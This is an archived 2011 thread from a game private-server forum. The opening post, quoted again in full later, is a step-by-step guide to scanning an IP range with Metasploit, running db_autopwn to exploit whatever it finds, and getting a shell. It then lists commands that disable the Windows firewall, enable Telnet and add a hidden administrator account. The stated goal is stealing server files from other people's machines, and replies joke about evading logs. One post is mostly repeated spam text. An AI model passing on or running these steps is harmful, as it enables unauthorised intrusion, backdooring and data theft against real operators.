Register for your free account! | Forgot your password?

You last visited: Today at 02:44

• Please register to post and access all features, it's quick, easy and FREE!

Advertisement

VSRO Server files!

Discussion on VSRO Server files! within the SRO Private Server forum part of the Silkroad Online category.

Closed Thread

Old   #1

elite*gold: 0
Lightbulb [GUIDE] Basic way to get VSRO Files (not sure yet).

Guys, seriously.. stop dreaming, i don't think any of these people will release the files, most of them are greedy, selfish personalities, look when they said - if we'll get files we'll share blablalba.. now what's going on? You all are like crazy after them. Either you get them from the people that got them or from the VSRO testserver.

Anyways, you can still try to find any vulnreabilities on VSRO servers maybe somoene gets lucky, here's a tip:

-
-
- install both
- open metasploit console
- type in:

Code:
db_connect [username]:[password]@localhost/[database_name_here] 
example: db_connect user:mypassword@localhost/metasploit
& hit enter.
- now type:

Code:
db_nmap 123.30.200.1-255
note: this can be also used for single ip adress. (ex: 123.30.200.70).
(it'll take a while to scan everything in there)
- after that you can do:

Code:
db_autopwn -p -t -e
(this will check all the possible vulnreabilities and launch all possible exploits against them) if any vulnreability will be found, you'll be taken to sessions list. (this process can take hours and hours).
now when it'll be loaded type:
Code:
sessions -l
note: small letter "L"
this will list all the available sessions
now type:

Code:
sessions -i [the number of session you wanna use for attacking vulnreability] 
(ex: [B]sessions -i 3[/B]).
If the vulnreability attack will be succesfull you will be able to execute commands.
now write:
Quote:
Shell
and you're on control of there computer.
And at this point you should finally be able to execute the commands which Chernobyl wrote:

Code:
netsh firewall set opmode disable (disables firewall)
sc config tlntsvr start= auto (starts service)
tlntadmn config port=23 sec=-NTLM (sets telnet port to 23)
net start Telnet (starts telnet)
net user Admin 7755xx! /add (creates user with username: Admin & password: 7755xx!)
net localgroup Administrators Admin /add (gives your Admin user Administrator privilegies)

note: never ever use username Admin (make it like windows or something.).
Good luck people, if anyone gets success on this, share the community, dont be bitchez. I did my best to help you out everyone. That's all.
Have fun hacking,
Miki Maus.

P.S. This is one of easiest ways how to attack other computers vulnreabilities, it's not just designed for vsro files, you can use this aswell against other servers, people..
Thanks
21 Users
Old 09/10/2011, 18:23   #2

Received Thanks: 1,886
It looks ..... interesting.
Old 09/10/2011, 18:25   #3

elite*gold: 11
Received Thanks: 1,700
the ******* server is already hacked
Old 09/10/2011, 18:28   #4

Quote:
Originally Posted by Johnny Waynetot View Post
the ******* server is already hacked
then find out the password which they created to enter it. and go on have the files, btw - my signature lowbob.
Old 09/10/2011, 18:32   #5

elite*gold: 11
Received Thanks: 1,700
Quote:
Originally Posted by Miki Maus View Post
then find out the password which they created to enter it. and go on have the files, btw - my signature lowbob.
hahaha low bob...i dont need the files^^ why you dont try it by yourself?? Better other ppl do the job for you.
Old 09/10/2011, 18:33   #6

elite*gold: 8
Don't forget to be anonym :P
Old 09/10/2011, 18:34   #7
Chat Killer In Duty

elite*gold: 5
Received Thanks: 6,470
Quote:
Originally Posted by Johnny Waynetot View Post
hahaha low bob...i dont need the files^^ why you dont try it by yourself?? Better other ppl do the job for you.
then dont post **** if you arent going to do
Old 09/10/2011, 18:34   #8

he dont want the fbi to come knocking on his door
Old 09/10/2011, 18:38   #9

Ye, but those scans are dangerous. Servers got your logs.
I suggest to use BT5.
Old 09/10/2011, 18:39   #10

i definetly bookmarked this and saved a copy in a doc file in case it gets deleted ^_^
Thanks
1 User
Old 09/10/2011, 18:39   #11

Quote:
Originally Posted by supertrilo View Post
he dont want the fbi to come knocking on his door
They wouldn't, i simply share what i know to community, can't understand trolls hating something here, it's already alot what i shared here.
Thanks
2 Users
Old 09/10/2011, 18:47   #12

elite*gold: 179
Quote:
Guys, seriously.. stop dreaming, i don't think any of these people will release the files, most of them are greedy, selfish personalities, look when they said - if we'll get files we'll share blablalba.. now what's going on? You all are like crazy after them. Either you get them from the people that got them or from the VSRO testserver.

Anyways, you can still try to find any vulnreabilities on VSRO servers maybe somoene gets lucky, here's a tip:

-
-
- install both
- open metasploit console
- type in:

Code:
db_connect [username]:[password]@localhost/[database_name_here] 
example: db_connect user:mypassword@localhost/metasploit
& hit enter.
- now type:

Code:
db_nmap 123.30.200.1-255
note: this can be also used for single ip adress. (ex: 123.30.200.70).
(it'll take a while to scan everything in there)
- after that you can do:

Code:
db_autopwn -p -t -e
(this will check all the possible vulnreabilities and launch all possible exploits against them) if any vulnreability will be found, you'll be taken to sessions list. (this process can take hours and hours).
now when it'll be loaded type:
Code:
sessions -l
note: small letter "L"
this will list all the available sessions
now type:

Code:
sessions -i [the number of session you wanna use for attacking vulnreability] 
(ex: [B]sessions -i 3[/B]).
If the vulnreability attack will be succesfull you will be able to execute commands.
now write:

and you're on control of there computer.
And at this point you should finally be able to execute the commands which Chernobyl wrote:

Code:
netsh firewall set opmode disable (disables firewall)
sc config tlntsvr start= auto (starts service)
tlntadmn config port=23 sec=-NTLM (sets telnet port to 23)
net start Telnet (starts telnet)
net user Admin 7755xx! /add (creates user with username: Admin & password: 7755xx!)
net localgroup Administrators Admin /add (gives your Admin user Administrator privilegies)

note: never ever use username Admin (make it like windows or something.).
Good luck people, if anyone gets success on this, share the community, dont be bitchez. I did my best to help you out everyone. That's all.
Have fun hacking,
Miki Maus.

P.S. This is one of easiest ways how to attack other computers vulnreabilities, it's not just designed for vsro files, you can use this aswell against other servers, people..
files was deleted from ftpfiles was deleted from ftpfiles was deleted from ftpfiles was deleted from ftpfiles was deleted from ftpfiles was deleted from ftpfiles was deleted from ftpfiles was deleted from ftpfiles was deleted from ftpfiles was deleted from ftpfiles was deleted from ftpfiles was deleted from ftpfiles was deleted from ftpfiles was deleted from ftpfiles was deleted from ftpfiles was deleted from ftpfiles was deleted from ftpfiles was deleted from ftpfiles was deleted from ftpfiles was deleted from ftpfiles was deleted from ftpfiles was deleted from ftpfiles was deleted from ftpfiles was deleted from ftpfiles was deleted from ftpfiles was deleted from ftpfiles was deleted from ftpfiles was deleted from ftpfiles was deleted from ftpfiles was deleted from ftpfiles was deleted from ftpfiles was deleted from ftpfiles was deleted from ftpfiles was deleted from ftpfiles was deleted from ftpfiles was deleted from ftpfiles was deleted from ftpfiles was deleted from ftpfiles was deleted from ftpfiles was deleted from ftpfiles was deleted from ftpfiles was deleted from ftpfiles was deleted from ftpfiles was deleted from ftpfiles was deleted from ftpfiles was deleted from ftpfiles was deleted from ftpfiles was deleted from ftpfiles was deleted from ftpfiles was deleted from ftpfiles was deleted from ftpfiles was deleted from ftpfiles was deleted from ftpfiles was deleted from ftpfiles was deleted from ftpfiles was deleted from ftpfiles was deleted from ftpfiles was deleted from ftpfiles was deleted from ftpfiles was deleted from ftpfiles was deleted from ftpfiles was deleted from ftpfiles was deleted from ftpfiles was deleted from ftpfiles was deleted from ftpfiles was deleted from ftpfiles was deleted from ftpfiles was deleted from ftpfiles was deleted from ftpfiles was deleted from ftpfiles was deleted from ftpfiles was deleted from ftpfiles was deleted from ftpfiles was deleted from ftpfiles was deleted from ftpfiles was deleted from ftpfiles was deleted from ftpfiles was deleted from ftpfiles was deleted from ftpfiles was deleted from ftpfiles was deleted from ftpfiles was deleted from ftpfiles was deleted from ftpfiles was deleted from ftpfiles was deleted from ftpfiles was deleted from ftpfiles was deleted from ftp
Old 09/10/2011, 18:50   #13

Quote:
Originally Posted by ermvrs View Post
files was deleted from ftpfiles was deleted from ftpfiles was deleted from ftpfiles was deleted from ftpfiles was deleted from ftpfiles was deleted from ftpfiles was deleted from ftpfiles was deleted from ftpfiles was deleted from ftpfiles was deleted from ftpfiles was deleted from ftpfiles was deleted from ftpfiles was deleted from ftpfiles was deleted from ftpfiles was deleted from ftpfiles was deleted from ftpfiles was deleted from ftpfiles was deleted from ftpfiles was deleted from ftpfiles was deleted from ftpfiles was deleted from ftpfiles was deleted from ftpfiles was deleted from ftpfiles was deleted from ftpfiles was deleted from ftpfiles was deleted from ftpfiles was deleted from ftpfiles was deleted from ftpfiles was deleted from ftpfiles was deleted from ftpfiles was deleted from ftpfiles was deleted from ftpfiles was deleted from ftpfiles was deleted from ftpfiles was deleted from ftpfiles was deleted from ftpfiles was deleted from ftpfiles was deleted from ftpfiles was deleted from ftpfiles was deleted from ftpfiles was deleted from ftpfiles was deleted from ftpfiles was deleted from ftpfiles was deleted from ftpfiles was deleted from ftpfiles was deleted from ftpfiles was deleted from ftpfiles was deleted from ftpfiles was deleted from ftpfiles was deleted from ftpfiles was deleted from ftpfiles was deleted from ftpfiles was deleted from ftpfiles was deleted from ftpfiles was deleted from ftpfiles was deleted from ftpfiles was deleted from ftpfiles was deleted from ftpfiles was deleted from ftpfiles was deleted from ftpfiles was deleted from ftpfiles was deleted from ftpfiles was deleted from ftpfiles was deleted from ftpfiles was deleted from ftpfiles was deleted from ftpfiles was deleted from ftpfiles was deleted from ftpfiles was deleted from ftpfiles was deleted from ftpfiles was deleted from ftpfiles was deleted from ftpfiles was deleted from ftpfiles was deleted from ftpfiles was deleted from ftpfiles was deleted from ftpfiles was deleted from ftpfiles was deleted from ftpfiles was deleted from ftpfiles was deleted from ftpfiles was deleted from ftpfiles was deleted from ftpfiles was deleted from ftpfiles was deleted from ftpfiles was deleted from ftpfiles was deleted from ftpfiles was deleted from ftp
you're an idiot or idiot? I SAID READ THE FUCKING TOPIC! YOU CAN USE THIS EXPLOIT AGAINST THE USERS WHO HAVE THE FILES ASWELL! USE YOUR BRAIN KID!.
EDIT: #Request ban this user. (spam.)
Old 09/10/2011, 18:51   #14

elite*gold: 179
Quote:
you're an idiot or idiot? I SAID READ THE ******* TOPIC! YOU CAN USE THIS EXPLOIT AGAINST THE USERS WHO HAVE THE FILES ASWELL! USE YOUR BRAIN KID!.
which stupid upload files to their ftp and their public_html ??
Old 09/10/2011, 18:52   #15

Quote:
Originally Posted by ermvrs View Post
which stupid upload files to their ftp and their public_html ??
/vote_ban
Thanks
3 Users
Closed Thread